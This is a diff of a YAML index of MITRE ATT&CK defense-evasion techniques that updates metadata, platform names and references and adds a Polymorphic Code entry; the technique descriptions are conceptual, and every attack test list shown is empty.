         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -9779,7 +9864,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -9854,6 +9938,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -9913,12 +9998,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9947,24 +10031,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -9999,9 +10085,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -10024,7 +10107,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -10042,8 +10125,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -10082,7 +10163,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10125,10 +10206,78 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests: []
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -10172,7 +10321,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10197,8 +10346,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1599:
@@ -10229,7 +10376,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -10248,7 +10395,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -10343,11 +10489,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10427,11 +10572,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10496,12 +10640,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests: []
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10550,8 +10693,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -10566,14 +10709,13 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests: []
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10585,7 +10727,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -10615,13 +10757,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10682,7 +10823,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1027.003:
@@ -10738,11 +10878,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10766,11 +10905,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -10795,9 +10933,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -10877,7 +11014,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -10911,7 +11047,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10938,8 +11074,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests: []
   T1553.004:
@@ -11034,48 +11168,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests: []
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -11084,9 +11194,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -11098,12 +11213,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests: []
   T1564.007:
@@ -11151,7 +11289,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11177,12 +11315,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11272,7 +11408,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1127.001:
@@ -11330,12 +11465,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests: []
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -11377,10 +11511,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -11404,18 +11537,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -11429,7 +11574,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
